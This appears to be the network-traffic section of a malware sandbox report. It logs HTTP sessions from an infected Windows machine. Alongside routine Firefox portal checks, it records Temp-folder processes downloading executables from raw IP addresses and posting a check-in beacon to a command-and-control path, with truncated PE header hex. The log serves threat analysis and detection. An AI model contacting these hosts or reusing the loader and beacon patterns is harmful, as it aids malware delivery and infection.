Nov 30, 2024 04:06:50.990819931 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Nov 30, 2024 04:06:51.370143890 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 29 Nov 2024 05:40:28 GMT Age: 77183 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Nov 30, 2024 04:07:01.387651920 CET	6	OUT	Data Raw: 00 Data Ascii:
Nov 30, 2024 04:07:03.950118065 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Nov 30, 2024 04:07:04.274657011 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 29 Nov 2024 05:40:28 GMT Age: 77196 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Nov 30, 2024 04:07:14.321144104 CET	6	OUT	Data Raw: 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49882	34.107.221.82	80	8136	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 04:06:49.761387110 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 30, 2024 04:06:50.845880985 CET	297	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sat, 30 Nov 2024 01:06:52 GMT Age: 7198 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 30, 2024 04:07:00.864090919 CET	6	OUT	Data Raw: 00 Data Ascii:
Nov 30, 2024 04:07:03.438710928 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 30, 2024 04:07:03.753575087 CET	297	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sat, 30 Nov 2024 01:06:52 GMT Age: 7211 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 30, 2024 04:07:13.818142891 CET	6	OUT	Data Raw: 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49892	31.41.244.11	80	2312	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 04:06:51.010266066 CET	62	OUT	GET /files/unique1/random.exe HTTP/1.1 Host: 31.41.244.11
Nov 30, 2024 04:06:52.345380068 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 30 Nov 2024 03:06:52 GMT Content-Type: application/octet-stream Content-Length: 4467200 Last-Modified: Sat, 30 Nov 2024 01:19:55 GMT Connection: keep-alive ETag: "674a683b-442a00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 65 49 49 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 4a 4f 00 00 d8 78 00 00 32 00 00 00 c0 ca 00 00 10 00 00 00 60 4f 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 f0 ca 00 00 04 00 00 0a 72 44 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 30 76 00 73 00 00 00 00 20 76 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc 9d ca 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c 9d ca 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELeIIg(JOx2`O@rD@ _0vs v v<(@.rsrc vL(@.idata 0vN(@ 8@vP(@jyijtabbR(@ckbvpoozD@.taggant0"D@
Nov 30, 2024 04:06:52.345428944 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 30, 2024 04:06:52.345513105 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 30, 2024 04:06:52.345524073 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 30, 2024 04:06:52.345671892 CET	896	IN	Data Raw: 0c f2 b7 98 c2 65 4f 3e d9 df 84 3b 2d 32 bc 88 2e 1e bc 75 0c 67 c4 bb ec da ca be b5 ed 87 94 01 1a e5 82 3d 2a 65 d9 7e e6 e1 c1 14 f2 b9 32 c2 ba 5e 0b c5 67 0d 3f 4b 27 88 71 44 27 a0 10 b0 52 77 59 d0 4c e8 12 4d 82 05 77 40 64 6d ca 41 c7 Data Ascii: eO>;-2.ug=e~2^g?K'qD'RwYLMw@dmArZ&)Dv[Qy%sGMaYN?;Mv65:J;RQG$?^SLh$0"vzjoU(\^q]BGC1$[1qAj8F-Ewvt}
Nov 30, 2024 04:06:52.345681906 CET	1236	IN	Data Raw: 42 2a 1f 8a 71 f4 39 10 dd 16 0b 5a e2 82 28 32 23 65 cb 70 a1 6c ab 4c 41 02 74 9a e1 57 60 e0 f9 e0 1c 62 78 6c 24 a7 57 75 dc 08 dd 78 e8 e0 e8 f3 77 dc 40 82 0d a8 5f b5 ed 4c 39 76 2c d0 51 68 8f 5e 69 ba 8e 1c 68 fe 5e 20 52 67 f3 4c 81 32 Data Ascii: Bq9Z(2#eplLAtW`bxl$Wuxw@_L9v,Qh^ih^ RgL2Zh=oMn61e%#ht<<['2A7CXAu-NGZ4\|}zWyv^b,{gjJl[~Mt:`QHMxv^&h?k{rEYV
Nov 30, 2024 04:06:52.345693111 CET	1236	IN	Data Raw: 30 ee d8 40 4c 6f 05 3a 41 17 77 59 ab df 77 04 27 61 de 5a 48 1d 6e 68 52 44 08 d9 1e 35 35 c8 3d 6e 24 b6 4d a6 ef d1 8d eb 50 87 08 c7 00 21 04 09 f5 1e 28 af ab 26 07 a4 45 06 79 f8 fb ab ff da 9c b8 a9 a7 e2 75 dc 0e 33 cf ee 7e 75 e8 42 ef Data Ascii: 0@Lo:AwYw'aZHnhRD55=n$MP!(&Eyu3~uB}]qwY}9tNp0'1F{Tn01k9.Yxe}[Q*A4m5Q,-VhWh2`F%U\$4XhE
Nov 30, 2024 04:06:52.345702887 CET	448	IN	Data Raw: f0 05 25 fd 62 ad 45 bd 28 33 60 9f 5b 2a 32 14 cf 47 80 f9 fd c0 9f a5 4f e5 94 0b ee 27 98 f2 d9 45 c3 55 d1 30 94 0f d2 d7 c6 2b ac ef 14 6d 15 e2 8e ac af c6 46 ca 54 e9 d0 3d 68 77 94 2a 43 0b 90 87 01 2f 8a ec 5c 34 37 ab d5 43 70 bf 6d 73 Data Ascii: %bE(3`[2GO'EU0+mFT=hwC/\47Cpms.+a~,7:-AGG,!m,cw<(S'md4E H>sYU){nY@)d.Y;6`>9dK)[>G2<EVti/Vq[r
Nov 30, 2024 04:06:52.345858097 CET	1236	IN	Data Raw: 9e 7c b4 0b b4 4a ed 5a cf 77 28 ea 6e ec 18 60 6f 5e be dc 68 e7 f8 10 f7 c1 d8 cb 74 74 ed 98 53 12 72 3c 9d 0b de d8 09 75 e5 e8 a2 94 d9 d9 f6 25 db 8c ef 97 9f 20 47 4c 37 63 d6 cf d1 fc 4a ee 20 45 9b 44 59 4e 62 35 51 c9 6c eb 99 12 3f 6a Data Ascii: \|JZw(n`o^httSr<u% GL7cJ EDYNb5Ql?j+i<LR^CKq0n^0ZiZO_#\|oRbYRdbteo$^H,FHZ#b_^ 7311cRS#GA7W3 ty7f,
Nov 30, 2024 04:06:52.345868111 CET	224	IN	Data Raw: 1b fa 92 26 c0 26 c2 d2 00 13 c4 1d 7d 22 dc ea 00 e3 3a fa 3e 25 ce f1 59 89 41 7e 07 26 5b db f3 60 c5 90 f9 25 38 f0 de 4c 83 c0 05 50 e4 2f 02 7d ac dc 82 5a 48 a6 e9 18 34 3a 12 d8 88 fe 6f 0a a9 88 23 a3 f4 14 05 2c e2 45 52 4e a8 97 09 58 Data Ascii: &&}":>%YA~&[`%8LP/}ZH4:o#,ERNXRGy>GM1:&6D$.O`l*Yn.P6"Q}mhkhG:Y.ZP"Pw'0OekE:h1L-nnUOC
Nov 30, 2024 04:06:52.467497110 CET	1236	IN	Data Raw: a2 75 5f 4c 58 e7 ae d2 5e 52 00 db 1c e0 84 d8 47 55 06 ec 21 8f 88 7b c1 f5 9c 6a ba 2a c8 c4 59 65 f0 76 45 0f 77 ea ae 05 46 31 c2 e8 8f f1 c0 d5 78 2d 03 55 a0 a8 0b 7b c8 f9 b6 d0 3c 7f c6 8e be cd 40 56 14 40 41 c2 78 ea 9a 27 c8 8c 9c 56 Data Ascii: u_LX^RGU!{jYevEwF1x-U{<@V@Ax'VPeu^vAk)s`@m-!\HnE_GG6^y?(6PsNF{OQll4,y96?z$wOvAJ$Y, J)M4A&NOtp[OJ{$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49894	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 04:06:51.627809048 CET	200	OUT	GET /off/def.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Nov 30, 2024 04:06:53.020988941 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 30 Nov 2024 03:06:52 GMT Content-Type: application/octet-stream Content-Length: 2765824 Last-Modified: Sat, 30 Nov 2024 03:03:30 GMT Connection: keep-alive ETag: "674a8082-2a3400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2a 00 00 04 00 00 b9 3a 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$* `@ :`Ui` @ @.rsrc`2@.idata 8@xbmfzvhb)):@ztggrlpz *@.taggant@"*@
Nov 30, 2024 04:06:53.021039963 CET	124	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 30, 2024 04:06:53.021363974 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 30, 2024 04:06:53.021447897 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 30, 2024 04:06:53.021456957 CET	248	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 30, 2024 04:06:53.021806002 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 30, 2024 04:06:53.021879911 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 30, 2024 04:06:53.021888971 CET	248	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 30, 2024 04:06:53.022166967 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 30, 2024 04:06:53.022270918 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 30, 2024 04:06:53.141028881 CET	1236	IN	Data Raw: 66 0e 5a 79 72 50 1c 28 8e 70 86 7f ad 5f 4e 64 44 c0 28 50 51 2b 62 7d c4 65 01 55 be 75 95 8a b3 3a 2f 4b d1 5a 42 a7 8a 54 d9 60 9a 67 42 5a 51 40 13 4f 5f d3 1d 46 98 30 fd cb 55 4e 93 43 48 41 36 1b 8d 30 fa ab f5 5d 6c cb 55 4e 93 b5 46 45 Data Ascii: fZyrP(p_NdD(PQ+b}eUu:/KZBT`gBZQ@O_F0UNCHA60]lUNFE60 JfS7(ViGI0S3BPKZ#hg!K-Upv)FebMo}#;Y8KtBITaM)E6Slq<eP3WQGTh,43%gz1l=_kyJp

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49919	185.215.113.43	80	2312	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 04:07:02.324780941 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 30 34 38 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010485001&unit=246122658369
Nov 30, 2024 04:07:03.724544048 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 30 Nov 2024 03:07:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49924	31.41.244.11	80	2312	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 04:07:03.930819035 CET	62	OUT	GET /files/unique2/random.exe HTTP/1.1 Host: 31.41.244.11
Nov 30, 2024 04:07:05.299300909 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 30 Nov 2024 03:07:05 GMT Content-Type: application/octet-stream Content-Length: 2038784 Last-Modified: Sat, 30 Nov 2024 01:37:00 GMT Connection: keep-alive ETag: "674a6c3c-1f1c00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f6 d9 52 43 b2 b8 3c 10 b2 b8 3c 10 b2 b8 3c 10 ac ea b8 10 ac b8 3c 10 ac ea a9 10 ad b8 3c 10 ac ea bf 10 cd b8 3c 10 95 7e 47 10 b1 b8 3c 10 b2 b8 3d 10 33 b8 3c 10 ac ea b6 10 b3 b8 3c 10 ac ea a8 10 b3 b8 3c 10 ac ea ad 10 b3 b8 3c 10 52 69 63 68 b2 b8 3c 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 18 5b c6 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 7c 05 00 00 ec 00 00 00 00 00 00 00 50 4c 00 00 10 00 00 00 90 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 4c 00 00 04 00 00 a1 26 1f 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$RC<<<<<<~G<=3<<<<Rich<PEL[d\|PL@L&[o`4lK P@.rsrc4`<@.idata @ @*@ilgfrtas@1@gipqdizh@L@.taggant0PL"@
Nov 30, 2024 04:07:05.299356937 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 30, 2024 04:07:05.299367905 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 30, 2024 04:07:05.299453020 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 30, 2024 04:07:05.299463034 CET	448	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 30, 2024 04:07:05.299526930 CET	1236	IN	Data Raw: e4 4b 9b c6 10 9d dc 9d 5f 5a d8 a1 d3 86 8a ea 6f 01 8c 2c bd 5e e9 02 d9 ee 2d c7 fa 63 09 48 fe 2b da ca 89 50 8d 42 20 a3 59 ca 44 68 3e a2 8e 59 f9 0c 31 95 d1 1c 6d 1a 99 c1 16 35 33 fa da a3 ee 0c 70 62 dd d1 3f 2b 7f d1 20 e6 37 d7 e7 ab Data Ascii: K_Zo,^-cH+PB YDh>Y1m53pb?+ 7s?l%=Su,&: ,8<DT&?%$g^i1$>fX9ma20')7Fa('@&{#(N)kc~.Q8HPmm^CH2+nYvjV?&5(
Nov 30, 2024 04:07:05.299535990 CET	1236	IN	Data Raw: 74 1f 38 8d 6b 1b 05 08 03 e8 1f 9d 1f ea 14 40 6b 00 29 a1 3a c4 17 a9 f7 4a 62 24 dc f2 6a cd 2f e2 28 83 3a fb ac c4 a9 6b 86 04 48 4c 29 2b 6f 68 a2 56 17 d1 e3 3b 46 2e 2c 2f 44 3d f9 e7 11 67 a6 55 df 12 eb 51 1b 3b 88 f3 38 18 48 62 d8 18 Data Ascii: t8k@k):Jb$j/(:kHL)+ohV;F.,/D=gUQ;8Hb#cMriocfZ]QTHiO"CF+z.5i,*1.5#(',#/B#F&K3PO702I0<M4@9P(B)>e1fhOiXjPgU^c^R]RM3
Nov 30, 2024 04:07:05.299665928 CET	1236	IN	Data Raw: d4 c7 5b 90 01 3b 29 de 0f 71 63 22 32 39 ea 0c 0e 0d 26 38 8b 91 73 42 08 61 cd 00 1e 69 a0 b4 c1 67 cb 71 e1 52 98 e0 d7 11 f9 f9 39 6b 8d 99 34 43 8e c5 b6 39 f8 fa e4 08 5f cb 30 14 c4 8a 5a 4c d8 0c 29 4a da c5 08 7e 74 c2 2f ef ac a8 01 b9 Data Ascii: [;)qc"29&8sBaigqR9k4C9_0ZL)J~t/F,Y>CT\CY)pCX4GKN%o)a}%EQ/JR&jO8%#Iq\|HdpYI?-#UHTxhB(YDH&? :rY)8
Nov 30, 2024 04:07:05.299741983 CET	672	IN	Data Raw: 65 69 e4 e6 34 ed 95 14 1b 22 f8 22 64 dd 88 4d e0 f8 f5 4f cb 8d e6 0b 5d 2f 59 f2 c0 d8 df d2 e8 94 2b 6a 64 25 39 62 5a 59 e1 fb 8a 69 cd 29 85 dd 23 cf 1a e5 1d 83 50 91 74 82 30 57 4f 6f 68 17 fe 5f 24 59 b9 8f 50 41 7f cb 5a 5f c3 c6 75 e3 Data Ascii: ei4""dMO]/Y+jd%9bZYi)#Pt0WOoh_$YPAZ_u*[X2c:4Qida 1%`a3#,x8!>E25JYFLX!3X)oi,`{s'9c[WJl)dAzq)8[
Nov 30, 2024 04:07:05.299751997 CET	1236	IN	Data Raw: d0 80 dc b4 c4 68 57 0f 47 89 f0 ee b0 29 39 05 e7 4e 44 5d 67 93 f4 13 67 50 0f 82 79 0d 59 12 f1 74 ea 68 82 77 a3 82 06 51 52 f2 20 01 98 c4 70 a6 f9 b3 f3 26 28 03 dd 39 f9 89 3d 8f ea c5 12 55 88 61 2c 0b 39 fa 8c 01 19 30 83 6b ac 76 a8 0f Data Ascii: hWG)9ND]ggPyYthwQR p&(9=Ua,90kv0Xzakua)kXD\Z`x0dgWF,@[NaK#~r6^DI)FX4k[[ )WO'M~jRTZXHm.ED$`RR}(A{Lz@\|Q$aE
Nov 30, 2024 04:07:05.423322916 CET	1236	IN	Data Raw: e6 cd 29 c2 96 06 df e0 93 6b 1f c5 eb 4c df 71 e6 77 33 c2 01 6b c1 f5 7f 67 ca 71 f6 6a 74 c5 b8 39 e8 c3 51 6b 93 42 91 5b 12 c5 d8 e9 58 45 66 ec 5c 49 e0 ef 81 4a 5f e3 85 4e 93 69 8b 73 90 da 8e 77 94 de d8 78 89 d1 77 7c 8d d5 7b c2 82 c8 Data Ascii: )kLqw3kgqjt9QkB[XEf\IJ_Niswxw\|{xe\|ijniiiz~quh7JNNNiL42yXA!K<5V&Eg8

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.4	49958	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 04:07:16.864572048 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
